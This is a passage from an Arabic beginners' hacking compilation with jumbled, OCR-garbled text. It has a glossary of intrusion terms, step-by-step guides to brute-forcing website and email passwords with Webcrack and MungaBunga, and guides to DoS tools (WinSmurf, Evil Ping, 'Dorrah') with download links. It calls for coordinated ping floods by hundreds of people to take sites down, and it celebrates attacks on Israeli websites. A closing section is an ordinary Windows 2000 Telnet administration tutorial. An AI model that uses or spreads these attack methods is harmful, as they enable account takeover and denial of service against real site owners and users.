‬يستخدمه الهاكرز‬ ‫غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ‪ ،‬و للتصال بالسيرفر‬ ‫عبر بورت معين و خصوصا بورت الف تي بي )‪ (21‬للدخول الى الموقع بطريقة خفية‬ ‫‪ Anonymous Mode‬لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات‪.‬‬ ‫لستخدام البرنامج ‪ ،‬اذهب الى ‪ Start ==> Run ==> telnet‬و ستظهر شاشة التلنت‪.‬و من أمثلة‬ ‫هذه البرامج‪ ،‬برنامج ‪ Shadow Security Scanner‬و ‪ Stealth‬و ‪Omran Fast‬‬ ‫‪ ، Scanner‬الخ ‪.‬‬ ‫‪23‬‬ .‫>ةةةةة<‬ ‫>ةةةةةة‪<BeReal :‬‬ ‫السلم عليكم‬ ‫لقد اعددت هذا الملف لخواني المبتدئين في تعلم طرق اختراق المواقع ‪ ،‬فقد‬ ‫تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد ل يفهمونها ‪،‬‬ ‫و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم ‪ .‬‬ ‫‪------------------------------------------------------------------------‬‬ ‫برامج السكان أو ‪ -:Scanner‬و هي برامج موجودة للمسح على المواقع و كشف‬ ‫ثغراتهاإن وجدت ‪ ،‬فهي سريعة‪ ،‬كما أنها تملك قاعدة بيانات واسعة و كبيرة‬ ‫تحتوي على الثغرات أو الكسبلويت )‪ (Exploits‬التي يتم تطبيقها على الموقع‬ ‫لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم ل ‪ .‬فال الموفق‪.‬‬ ‫===========================================================‬ ‫==========‬ ‫تلنت )‪ -:(Telnet‬و هو برنامج صغير موجود في الويندوز ‪ .‬أي أن باستطاعة هذا البرنامج التصال بالسيرفر‬ ‫أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها ‪ .‬و هو يعمل ككلينت‬ ‫أو وضعيته تكون دائما كزبون ‪ .‬‬ ‫و لهذه البرامج أنواع مختلفة ‪ ،‬منها التي تقوم بعمل سكان على نظام أو سيرفر‬ ‫معين مثل البرامج المختصة بالسكان على سيرفرات الـ ‪ IIS‬و منها برامج المسح‬ ‫على ثغرات السي جي اي فقط ‪ CGI‬و ما الى ذلك ‪.

(c.‬‬ ‫هذه الكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها‬ ‫أي الكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلل المتصفح ‪ ،‬و لتحويل‬ ‫الكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ‪ ،‬نحتاج إما الى‬ ‫نظام التشغيل لينوكس او يونكس ‪ ،‬او الى اي كومبايلر يعمل ضمن نظام التشغيل‬ ‫ويندوز ‪ .‬أشهر هذه الكومبايلرات ) المترجمات أو المحولت ( برنامج اسمه‬ ‫‪ Borland C++ Compiler‬و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا‪. Fire Wall‬و هناك بعض الكسبلويتات المكتوبة بلغة السي و يكون‬ ‫امتدادها )‪.‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪24‬‬ .‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫الجدار الناري ‪ -:FireWall‬هي برامج تستعملها السيرفرات لحمايتها من الولوج‬ ‫الغير شرعي لنظام ملفاتها من قبل المتطفلين ‪ .‬و لها عنوان‬ ‫‪ ، URL‬تقوم هذه الكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى‬ ‫السيرفر و التجول فيه ‪ ،‬كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين‬ ‫في السيرفر لعمل كراش له ‪ ،‬و هذا ما يسمى بـ ‪. Buffer Over Flow Exploits‬‬ ‫هناك أنواع من الكسبلويت ‪ ،‬فمنها ال ‪ CGI Exploits‬أو ال ‪ CGI Bugs‬و منها‬ ‫ال ‪ Unicodes Exploits‬و منها ال ‪ ، Buffer Over Flow Exploits ،‬و منها‬ ‫ال ‪، PHP Exploits‬و منها ال ‪ DOS Exploits‬و التي تقوم بعملية حجب الخدمة‬ ‫للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر‬ ‫أي فايروول ‪ .‫‪-----------------------------------------------------------------------‬‬ ‫اكسبلويت )‪ -:(Exploits‬هي برامج تنفيذية تنفذ من خلل المتصفح ‪ .‬هي تمثل الحماية للسيرفر طبعا ‪،‬‬ ‫و لكني أنوه بأن الفايروولت المستخدمة لحماية السيرفرات ) المواقع ( تختلف‬ ‫عن تلك التي تستخدم لحماية الجهزة ‪.

‬باسورد الموقع موجود في نفس الملف طبعا‪.‫‪ -:Token‬هو ملف الباسورد المظلل )‪ (Shadowed Passwd‬و الذي يكون فيه الباسورد‬ ‫على شكل * أو ‪ x‬أي ‪ .‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ : passwd file‬هو الملف الذي يحتوي على باسورد الروت و باسوردات الشخاص‬ ‫المصرح لهم بالدخول الى السيرفر ‪ .‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ -:Valnerableties‬أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب‬ ‫و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى‬ ‫استغللها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره ‪. etc/shadow/‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ -:Anonymouse‬هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد‬ ‫اختراقه‪ .‬و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة‬ ‫بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع‬ ‫‪ Security Focus‬أو بوق تراك او غيرها ‪. Shadowed‬إن وجدت ملف الباسورد مظلل ‪ ،‬فيجب عليك حينها‬ ‫البحث عن ملف الباسورد الغير المظلل و الذي يسمى ‪ .‬هناك خاصية في برامج الف تي بي بنفس السم ‪ ،‬تستطيع ان تستعملها‬ ‫في الدخول المجهول الى السيرفر و سحب الملفات منه ‪.‬‬ ‫ما هي مفردها ؟ ‪ Valnerable ، (:‬أي ثغرة أو بالصح موضع الضعف و المكان‬ ‫الغير مؤمن بشكل سليم ‪ .‬‬ ‫‪---------------------------------------------------------------------‬‬‫الجذر أو الـ ‪ : root‬و هو المستخدم الجذري و الرئيسي للنظام ‪ ،‬له كل الصلحيات‬ ‫‪25‬‬ . Shadow file‬تجده في‬ ‫‪.

.‬جزاكم ال خيرا أيها المجاهدون ‪.DOS -‬اذ أنها تقوم بعملية اوفر لود على‬ ‫جزء مركز من السيرفر ‪.‫في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات‪.‬‬ ‫و هي شبيهة نوعا ما بعملية حجب الخدمة ‪ .‬ضربة الهاكرز طبعا هي اختراق‬ ‫السيرفر الذي يملك الكثير من المواقع ‪ ،‬فيسهل حينها اختراق جميع المواقع التي‬ ‫تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو‬ ‫سرقة بياناتها و تدميرها أو مسحها من النت تماما ‪ ،‬و هذا ما يحدث للمواقع‬ ‫السرائيلية و بكثرة و ل الحمد ‪ . (:‬قد يملك و يستضيف السيرفر أكثر من موقع‬ ‫واحد‪ ،‬و هذا يعتمد من سيرفر لخر و من شركة لخرى‪ .‬‬ ‫‪---------------------------------------------------------------------‬‬‫السيرفر ‪ :Server‬هو الجهاز المستضيف للموقع ‪ ،‬اذ أن كل ملفات الموقع توضع فيه‬ ‫فهو جهاز كمبيوتر عاد كغيره من الجهزة لكنه ذو امكانيات عالية ككبر حجم القرص‬ ‫الصلب و سرعته الهائلة ‪ ،‬و هو متصل بالنترنت ‪ 24‬ساعة ‪ ،‬و هذا هو سبب كون‬ ‫المواقع شغالة ‪ 24‬على النترنت ‪ .‬‬ ‫غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن‬ ‫نظام التشغيل لينوكس او يونكس و سولري و فري بي اس دي و غيرها ‪.‬‬ ‫انتهى‪،،،‬‬ ‫"اختراق المواقع للمبتدئين"‬ ‫الختراق للمبتدئين‪:::‬‬ ‫‪26‬‬ . -‬‬ ‫‪----------------------------------------------------------------------‬‬‫بوفر أوفر فلو ) ‪ : ( Buffer over Flow‬و هي نوع من أنواع الكسبلويتات التي‬ ‫تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الف تي بي‬ ‫أو غيره لجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و للغاء الرقعة‬ ‫الموجودة بها كي يتم استغللها مجددا ‪ -‬بعد عمل الكراش لها طبعا ‪ -‬يتم استغللها‬ ‫في معاودة التصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها ‪.

‬وهذه البرامج تحتوي على قائمة كبيرة تحتوي على كلمات سر يقوم‬ ‫البرنامج بتجربها على الموقع الهدف الى أن يصل إلى كلمة السر الصحيحة الخاصة بالموقع الهدف وبعد‬ ‫ذلك يسيطر المخترق على الموقع‪ .‬لكن يعيب هذه الطريقة أنها تستمر إلى أوقات طويلة بالساعات وباليام‬ ‫وهي مكلفة ماديا لن الجهاز سيبقى متصل طوال الوقت بالنترنت حتى يتم اكتشاف كلمة السرالصحيحة‪.‫في هذا القسم سوف أقوم بشرح الطرق المستخدمة في اختراق المواقع بالنسبة للمبتدئين وهذه الطرق تعتمد‬ ‫اعتمادًا كليًا على برامج التخمين‪ .‬‬ ‫انتهى‪،،،‬‬ ‫" الختراق ببرنامج ‪" Webcrack‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫‪27‬‬ .

.‬‬ ‫‪28‬‬ .‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫مرحبا شباب‬ ‫انا اعلم ان الكثير منك يعرفون هذا البرنامج لكن هل جربتوه ‪ ....‬احب اقول‬ ‫انه واحد من اقوى البرامج لاختراق المواقع وانا من الشخاص الذين يعتمدون عليه‬ ‫الشرح ‪..

29 .

‫وهذي وصلة البرنامج‬ http://www.dunbell.co.freeserve.zip ،،،‫انتهى‬ " MungaBunga ‫"الختراق ببرنامج‬ 30 .uk/webcrack40.

.‫>ةةةةة<‬ ‫>ةةةةةة‪< KING HAKER :‬‬ ‫السلم عليكم و رحمه ال على اخوانى‪:‬‬ ‫اليوم نشرح برنامج ‪ MUNGA BUNGA‬الذى يعد من افضل برامج اختراق اليميل حتى الن و لكن‬ ‫يوجد به عيب بسيط و هو انه ل يوجد به بروكسى‬ ‫اما مميزاته فكثيره جدا‪:‬‬ ‫‪-1‬سريع جدا فى تجربه الكلمات‬ ‫‪-2‬يواصل التجربه تلقائيا بعد انقطاع الخط‬ ‫‪-3‬يمكنك اختراق المواقع به ايضا‬ ‫‪-4‬يعلن لك حاله اتصاله بسرفر اليميل الذى تخترقه‬ ‫‪-5‬يمكنك التحكم فى عدد حروف الكلمات الذى سيبدا بها)حسب التوقع(‬ ‫‪-6‬يحتوى على قائمه باسوردس خاصه بالهوت ميل و بها عدد هائل من الكلمات المتوقعه‬ ‫و كذلك بالنسبه للياهو‬ ‫و السرفرات الخرى ايضا‬ ‫و الن نبدا الشرح‪:‬‬ ‫هذا شكل البرنامج عند تشغيله‬ ‫فى رقم ‪ 1‬تضع اليميل الذى ستخترقه‬ ‫فى ‪ 2‬تضغط ‪ BROWSE‬و تضع قائمه الباسوردس المليئه بالكلمات الذى سيقوم البرنامج بتجربتها‬ ‫فى ‪ 3‬تضغط على ‪ BROWSE‬ايضا و تضع القائمه الخاصه بسرفر اليميل الذى ستخترقه )اذا كان فى‬ ‫الهوت ميل تضع قائمه الهوت ميل ‪.‬الخ(‬ ‫‪ 4‬هو زر بدء الهكر على اليميل و تجربه الكلمات‬ ‫‪31‬‬ ....

htm‬‬ ‫انتهى‪،،،‬‬ ‫" برنامج تدمير المواقع ‪" WinSmurf‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫‪32‬‬ .mbnet.fi/hypnosis/caliberx/cracking.‫فى ‪ 5‬يعرض الباسوردس التى يجربها الن )فى وقت الهكر(‬ ‫فى ‪ 6‬يعرض الكلمات التى بها اخطاء و سيتم المحاوله بها مره اخرى‬ ‫‪ 7‬هى حاله التصال بالسرفر الموجود به اليميل‬ ‫فى ‪ 8‬يعرض معلومات السرفر التابع لليميل الذى يجرب عليه‬ ‫بالضغط على رقم ‪ 9‬تذهب مباشره الى موقع البرنامج الرئيسى‬ ‫نضع علمه صح امام ‪ 10‬حتى اذا انقطع الخط فجاءه يتوقف البرنامج و عند معاوده التصال يستمر فى‬ ‫التجربه و ل يبدا من الول‬ ‫عند و ضع العلمه على ‪ 11‬ل يجرب البرنامج الكلمات التى بها اخطاء التى تظهر فى رقم ‪6‬‬ ‫نضع علمه صح امام ‪ 12‬حتى ل يجرب البرنامج الكلمات التى تحتوى على مسافات‬ ‫عند وضع العلمه على ‪ 13‬ل يجرب البرنامج الكلمات التى اقل من خمس احرف )مطلوب فى الهوت ميل(‬ ‫و عند وضع العلمه ايضا على ‪ 14‬ل يجرب البرنامج الكلمات التى هى اكثر من عشره احرف‬ ‫اليس برنامج ممتاز‬ ‫و قوى و سريع‬ ‫وصلة التنزيل ‪:‬‬ ‫‪http://koti.

de/files/WSmurf.zip‬‬ ‫انتهى‪،،،‬‬ ‫" شرح برنامج ‪ Evil Ping‬لتدمير المواقع "‬ ‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫‪33‬‬ ...‬‬ ‫وصلة البرنامج‪.‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫أثبت هذا البرنامج فعاليته الكبيرة في تدمير المواقع ولسيما أنه قوي جدا في إرسال طلبات وسريع ‪..‬‬ ‫إذا هاهو البرنامج الحديث من ‪ winsmurf‬والذي يسميه البعض مرعب المواقع‬ ‫‪Scree Shot‬‬ ‫‪--------------------------------------------------------------‬‬ ‫‪-------------------------------------------------------------‬‬‫*** كيف تستخدم ‪ winsmurf‬؟ ***‬ ‫في غاية البساطة فقط قم بإنشاء ملف ‪ txt‬يعني نصي وحط في حروف وأرقام كثيرة يعني حاول تخلي الملف‬ ‫كبير شوي وبتعدى ‪ Kb 10‬بعدين احفظه‬ ‫وبعد كذا قم بتشغيل ‪winsmurf‬‬ ‫واستعرض الملف ‪.planet-eagle.‬‬ ‫‪http://www..

‬استخدامه من قبل ‪ 200‬شخص على القل في نفس الوقت على نفس الموقع لينجح التدمير بإذن ال عزوجل‬ ‫‪.‬ويمكن زيادة الهجمات لتصبح أقوى حتى يتم تدمير الموقع‬ ‫‪،،،‬انتهى‬ ‫" شرح برنامج الدرة لتدمير المواقع "‬ ‫>ةةةةة <‬ ‫‪34‬‬ .‫‪.

‬‬ ‫و لتخفي هويتك عند الهجوم قم بتشغيل ‪:‬‬ ‫و ضع رقم البروكسي التالي‬ ‫‪35‬‬ .‬و عند تشغيله سيظهر لك الشكل التالي ‪:‬‬ ‫لبدء الهجوم فقط إضغط على‬ ‫وليقاف الهجوم إضغط على‬ ‫عند بدء الهجوم سيعمل برنامج الدرة على بحث البروكسي الخاص بك و سيضعه لك في مكانه‪.‬فك ضغط الملف ‪ .‫عند النتهاء من تحميل البرنامج ‪ .

‬‬ ‫فقط قم بضغط‬ ‫و لمعرفة آخر اخبار البرنامج و المواقع التي تم النجاح بقصفها فقط قم بضغط ‪:‬‬ ‫و سيظهر لك الشكل التالي ‪:‬‬ ‫قم بضغط‬ ‫و ستظهر لك الخبار‪.‬قم بتشغيل ‪:‬‬ ‫لتشغيل البرنامج عند عمل الوندوز قم بتشغيل ‪:‬‬ ‫‪36‬‬ .‬‬ ‫و لعمل البرنامج بطريقة ذكية بحيث ل يبطيء النترنت ‪ .‫وسيكون عنوان الموقع المراد الهجوم عليه هنا‬ ‫و من خواص هذا البرنامج انه ل يستطيع احد تغيير جهة الهجوم و لتجديد عنوان الموقع المراد الهجوم عليه‬ ‫و هو سيقوم تلقائيا بالبحث و التغيير‪.

com/boom_q8y4/dorrah..zip‬‬ ‫‪،،،‬انتهى‬ ‫" تدمير المواقع بدون برامج "‬ ‫> ةةةةةة‪:‬ةةةة ةةة <‬ ‫‪37‬‬ .geocities.‬وصلة تحميل البرنامج‬ ‫‪http://www.‫الشكل التالي يمثل عدد المرات الناجحة ‪:‬‬ ‫‪ :‬و هذا يمثل عدد المرات الفاشلة‬ ‫‪.

.‬‬ ‫انتهى‪،،،‬‬ ‫" التلنيت "‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫‪38‬‬ .com‬‬ ‫‪ :Xxx‬يعني اسم الموقع‬ ‫‪...xxx..‬كبير على الموقع نفسه ويقوموا بتطيق الطريقة معا بعض في نفس الوقت‬ ‫‪::‬الطريقة الولى‬ ‫قم بالتوجه إلى "الدوس" ===<== اكتب المر التالي ‪:‬ـ‬ ‫‪Ping www.‬‬ ‫قم بكتابة المر‪:‬‬ ‫‪ping -t ip‬‬ ‫حيث ‪ ip‬يعني أي بي الموقع الموراد‪.xx.‬بعد ذلك سيخرج لك رقم أي بي الموقع‬ ‫‪:‬قم بكتابة المر‬ ‫)اسم الموقع( )قوة الضربه( ‪) I-‬عددالضربات( ‪ping -n‬‬ ‫مثال ذلك‪:‬‬ ‫‪ping -n 1000 -l 400 www.‫في هذا الدرس سأقوم بشرح عدة طرق لتدمير المواقع بدون برامج ولكن هناك شرط لتدميرها أن يجتمع عدد‬ ‫‪.com‬‬ ‫الطريقة الثانية‪::‬‬ ‫بعد استخراج الي بي تبع الموقع المراد بالطريقة الي في العلى‪.

The security scheme is integrated into Windows 2000 security. The user name and password are encrypted ‫ إذا كنت تستخدم خيار التحقق من‬، ‫اسمك وكلمة المرور الخاصه بك من اجل الوصول إلى ملقم التلنت‬ ‫ سيرسل السم و كلمة المرور مشفرة وإذا لم تكن مستخدمة سترسل كنص عادي‬NTLM ‫الصحة‬ ‫ملحظة‬ If the User Must Change Password At Next Logon option is set for a user. the user name and password are sent to the Telnet server as plain text. stop.automatic startup ‫ لتشغيل أو إيقاف خدمة التلنت‬Services ‫ ويمكن إستخدام الداة‬، ‫على الوضع اليدوي‬ 39 . If you do not use the NT LAN Manager (NTLM) authentication option. or configure the Telnet service for ‫ تكون خدمة التلنت غير منشطة وتكون‬2000 ‫ في التثبيت الفتراضي لويندوز‬.s 2000 security context for authentication and the user is not prompted for a user If you are using NTLM authentication. and then log on through the Telnet client ‫الخيار منشط في خصائص كلمة المرور لحد المستخدمين لن يتمكن من الدخول على ملقم التلنت عند‬ ‫ يجب الدخول ثم تغير كلمة المرور ثم التسجيل على خدمة التلنت‬NTLM ‫إستخدام‬ ‫تشغيل و إيقاف ملقم التلنت‬ In a Windows 2000 Server default installation. the Telnet service is set to manual startup. You can use the Services snap-in or the Computer Management snap-in to start. The user must log on to the server directly and ‫ إذا كان هذا‬. the client uses the Windowname ‫يمكن استعمال‬.change the password. the user cannot log on to the Telnet service when NTLM authentication is used.and password.‫بعد قراءة هذا الموضوع ستكون قادر على‬ ‫فهم معنى خدمة التلنت‬ ‫معرفة مكان تشغيل الخدمة والتحكم بها‬ ‫تمرين التثبيت وإستخدام التلنت‬ ‫ تسمح لمستخدمين عميل التلنت بالتصال بكمبيوتر يشغل خدمة التلنت‬2000 ‫خدمة التلنت في ويندوز‬ ‫ ويمكن أن تكون خدمة التلنت عبارة لتصال‬، ‫وإستعمال سطر الوامر ويصبح كما لو كان يجلس أمامه‬ ‫المستخدمين مع بعضهم البعض‬ ‫ عميل تلنت في أي وقت‬63 ‫وأي كمبيوتر يشغل خدمة التلنت يمكن أن يدعم إلى‬ Telnet Authentication You can use your local Windows 2000 user name and password or domain account information to access the Telnet server.

Start ‫ أو اضغط‬Administrative Tools ‫في‬ . Telnet Server Admin ‫لفتح الداة‬ ‫ إذا كنت ل‬. stop. You can also use it to get a list of current users. or get information about Telnet Server.Enter Telnet Server Admin ‫الداة‬ You can use the Telnet Server Admin utility to start.Run ‫ ثم‬. To start Telnet Server.registry settings ‫على معلومات عن الملقم ويمكن كذلك الحصول على عدد المستخدمين و التحكم في الجلسة الحالية من‬ ‫إنهاء التصال و تغير العدادات‬ ‫ الموجودة‬Telnet Administration Tool ‫ أضغط على‬. or change Telnet Server ‫ لتشغيل أو إيقاف أو الحصول‬Telnet Server Admin ‫يمكن إستخدام الداة‬. and then press Enter.(Adminpak. Select Services from the console . type net start tlntsvr or net start telnet at the command prompt. type net stop tlntsvr or net stop telnet at the command prompt. and then press .tree. and then select Telnet from the list of services in the details pane ‫تشغيل التلنت و إيقافة من سطر الوامر‬ You can also start or stop the Telnet service from a command prompt.‫مكان التلنت‬ In the Computer Management snap-in.tlntadmn ‫ اكتب‬. Telnet Server Admin ‫تستطيع فتح الداة‬ Telnet Server Administration ‫يبين الجدول التالي خيارات الداة‬ ‫الوصف‬ ‫السم‬ ‫الخيار‬ Telnet Server Admin ‫ينهي جلسة الداة‬ Quit this application 0 ‫يبين المستخدمين المتصلين بخدمة التلنت مع توضيح اسم المستخدم و الدومين و وعنوان‬ ‫الجهاز ووقت الدخول‬ List the current users 1 ‫ ينهي جلسة أحد المستخدمين الذي أنت تختاره‬Terminate a user session 2 ‫يزود قائمة بإعدادات السجل التي يمكن تغيرها‬ Display/change registry settings 3 ‫يشغل خدمة التلنت‬ Start the service 4 ‫يوقف خدمة التلنت‬ Stop the service 5 ‫إصطياد المشاكل‬ ‫يبين الجدول التالي بعض المشاكل التي يمكن أن تواجهك عند إستخدام التلنت‬ 40 . To stop Telnet Server.msi) ‫ تحتاج إلى تثبيت أدوات الدارة‬. Telnet is a service located under the Services and Applications node.OK ‫ ثم‬. terminate a user's session.

Communication.telnet ‫ ثم اكتب‬.Telnet ‫لتشغيل‬ ‫ مثبت على جهازك ومضبوط تكوينه ويكون‬TCP/IP ‫لتتمكن من أستخدام التلنت يجب أن يكون البروتوكول‬ ‫لديك حساب مسجل على الجهاز الذي ستتصل به‬ To display help for Telnet.if you were sitting in front of it Users of previous versions of Microsoft's Telnet client may notice a few changes in the version included with Windows 2000. Once you have made this connection.running the Telnet service 41 . a computer using Microsoft Telnet Client can log on to a Windows 2000 computer running the Telnet . . To connect to a site. type help at the Microsoft Telnet command prompt. The type of session you conduct depends on how the Telnet software is configured. to connect to a remote computer over a network. You can use the Telnet client provided with Windows 2000 to connect to a remote computer. The Telnet client software allows a computer to connect to a remote server.‫ في موجه الوامر‬telnet ‫ وتستطيع كتابة‬.Run ‫ ثم‬. games. part of the TCP/IP suite of protocols. system administration. log on to the remote computer. Using this feature. and interact with it as .UNIX-based Telnet clients An important new feature found in Microsoft Telnet Client is NTLM authentication support.Start ‫ انقر‬. The most obvious change is that Microsoft Telnet Client is now a command-line application rather than a Windows application.and local logon simulations are some typical uses of Telnet The Telnet client uses the Telnet protocol. you can communicate with the Telnet server.service by using NTLM authentication ‫إستعمال التلنت‬ .‫الحل‬ ‫السبب‬ ‫رسالة الخطاء‬ ‫راجع الخيارات وأعد كتابة خيارك‬ ‫القيمة المكتوبة لم تكن مقبولة‬ Invalid input ‫شغل خدمة التلنت‬ ‫خدمة التلنت غير مشتغلة‬ Failed to open the registry key ‫شغل الخدمة‬ ‫خدمة التلنت غير مشتغلة على الملقم‬ Failed to query the registry value ‫عميل التلنت‬ You can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server software. As a command-line application. type open <computer_name> where <computer_name> is the IP address or host name of the computer . Microsoft Telnet Client will seem very familiar to users of .

OK‬‬ ‫تظهر موجه أوامر مايكروسوفت تلنت‬ ‫اكتب ‪ help‬أو ? لمشاهدة الوامر المتاحه‬ ‫تظهر جميع الوامر المدعومة في خدمة التلنت‬ ‫اكتب ‪open Hishem2‬‬ ‫ستشاهد شاشة الترحيب‬ ‫‪42‬‬ .Programs‬ثم ‪ Administrative Tools‬اضغط ‪.‫تمرين ضبط وإتصال بخدمة التلنت‬ ‫في هذا التمرين يجب أن يكون لديك شبكة على القل جهازين متصلين مع بعضهم البعض‬ ‫ولنفترض أن الجهاز الول اسمه ‪ Hishem1‬و الثاني ‪Hishem2‬‬ ‫وسنفترض أن خدمة التلنت مثبته على ‪ Hishem2‬ثم سنقوم بالتصال من ‪ Hishem1‬إلى ‪Hishem2‬‬ ‫سنقوم الن بتثبيت الخدمة على جهاز ‪Hishem1‬‬ ‫سجل الدخول إلى ‪ Hishem1‬ك ‪Administrator‬‬ ‫من ‪ .Telnet‬‬ ‫يظهر مربع حوار ‪(The Telnet Properties (Local Computer‬‬ ‫غير ‪ Startup Type‬من ‪ Manual‬إلى ‪.Services‬‬ ‫تظهر الداة ‪Services‬‬ ‫من النافذه مرر ألى اسفل ثم ضغط مزدوج على ‪. Start‬ثم ‪ .Automatic‬‬ ‫في القسم ‪. Start‬ثم ‪.Service status‬اضغط ‪. Services‬‬ ‫سنتصل من ‪ Hishem1‬إلى ‪Hishem2‬‬ ‫من ‪ . Start‬‬ ‫اضغط ‪ OK‬لغلق مربع الحوار )‪Local Computer) Telnet properties‬‬ ‫أغلق وحدة التحكم ‪.Run‬‬ ‫اكتب ‪ telnet‬ثم ‪.

Start‬ثم ‪.‫ملحظة‬ ‫يمكن إستخدام حرف ‪ o‬بدل ‪open‬‬ ‫أي اوامر يمكنك تشغيلها من سطر الوامر في ‪Hishem2‬‬ ‫اترك هذا التصال نشط ل توقفه سننتقل الن إلى جهاز ‪ Hishem2‬لمشاهدة جلسة التلنت‬ ‫من جهاز ‪ Hishme2‬سنراقب خدمة التلنت ثم نوقف ونقطع التصال من العميل ‪Hishem1‬‬ ‫من ‪ .Run‬‬ ‫اكتب ‪ tlntadmn‬ثم ‪.OK‬‬ ‫يظهر إطار اوامر الداة ‪Telnet Server Admin‬‬ ‫اكتب ‪ 1‬لمشاهدة جميع التصالت الحالية كما في المثال نشاهد قد عرض اسم المستخدم و اسم الدومين‬ ‫‪ NOR‬ورقم ‪ IP‬ونوع التصال ووقت الدخول‬ ‫اكتب ‪ 2‬لنهاء جلسة مستخدم‬ ‫‪43‬‬ .

‫تظهر رسالة تطلب منك تحديد هوية المستخدم الذي تريد فصله‬ ‫اكتب ‪1‬هذا رقم المستخدم في القائمة ول يوجد معنا في المثال غير و احد لذالك تكتب ‪1‬‬ ‫تظهر لئحة بالوامر المتاحة‬ ‫إرجع إلى جهاز ‪ Hishem1‬سترا أن التصال قد إنفصل مثل المثال‬ ‫اضغط أي مفتاح للمتابعة‬ ‫كيف نستفيد من خدمة التلنت في جلب البريد‬ ‫إذ تعذر عليك سحب البريد بالبرامج المخصصة لسبب ما يمكن أن تستخدم التلنت لسحب البريد وحذف‬ ‫الرسائل التي قد تكون سبب المشكلة و الطريقة كما يلي‬ ‫تكون على إتصال مع الشبكة‬ ‫من ‪ Start‬ثم ‪ Run‬ثم تكتب ‪ Telnet pop.mail.yahoo.com 110‬طبعا إذا كان حسابك مع‬ ‫الياهو أو اكتب الحساب الخاص بك مع ملحظة وجود فراغ بين الكلمة الولى و الجملة الثانية و الرقم‬ ‫ستظهر لك نافذة مثل الدوس اكتب ‪ user‬ثم اكتب بعدها اسم المستخدم في بريدك مع ملحظة أن الذي‬ ‫ستكتبه ل تشاهده على النافذة ل تهتم مثل ‪ user xxxx‬ثم إنتر‬ ‫بعد ذلك اكتب ‪ pass‬ثم اكتب الرقم السري مثل ‪ pass xxxx‬ثم إنتر‬ ‫إذا كان إدخالك صحيح ستشاهد كلمة ‪ Ok‬بعد ما تضغط إنتر‬ ‫سيتم إدخالك إلى الحساب‬ ‫لمشاهدة جميع الرسائل وأحجامها اكتب ‪ List‬ثم إنتر‬ ‫ستشاهد ترتيب الرسائل تحت بعض وأمام كل رقم رقم ثاني يدل على حجم الرسالة‬ ‫‪44‬‬ .

‫لحذف رسالة من القائمة اكتب ‪ dele‬ثم رقم الرسالة الهدف‬ ‫تنفع هذه الطريقة مع بريد ‪pop‬‬ ‫طريقة سحب البريد عن طريق التلنت من الدكتور الفنتوخ‬ ‫بعض الوامر المستخدمة مع التلنت‬ ‫وصل عميل التلنت مع جهاز بعيد‬ ‫بناء الجملة‬ ‫‪[open [\\RemoteServer] [Port‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .o‬‬ ‫أمثلة‬ ‫للتصال بملقم بعيد ‪ Redmond‬من خلل رقم المنفذ ‪ ،44‬اكتب‪:‬‬ ‫‪o redmond 44‬‬ ‫لقطع تصال عميل ‪ Telnet‬من كمبيوتر بعيد‬ ‫بناء الجملة‬ ‫‪[close [\\RemoteServer‬‬ ‫المعلمات‬ ‫‪45‬‬ .‬‬ ‫‪Port‬‬ ‫تحديد المنفذ الذي تريد استخدامه‪ .‬‬ ‫ملحظات‬ ‫يمكنك اختصار هذا المر إلى ‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬إن لم تحدد منفذًا ما‪ ،‬سيتم افتراض المنفذ الفتراضي‪.

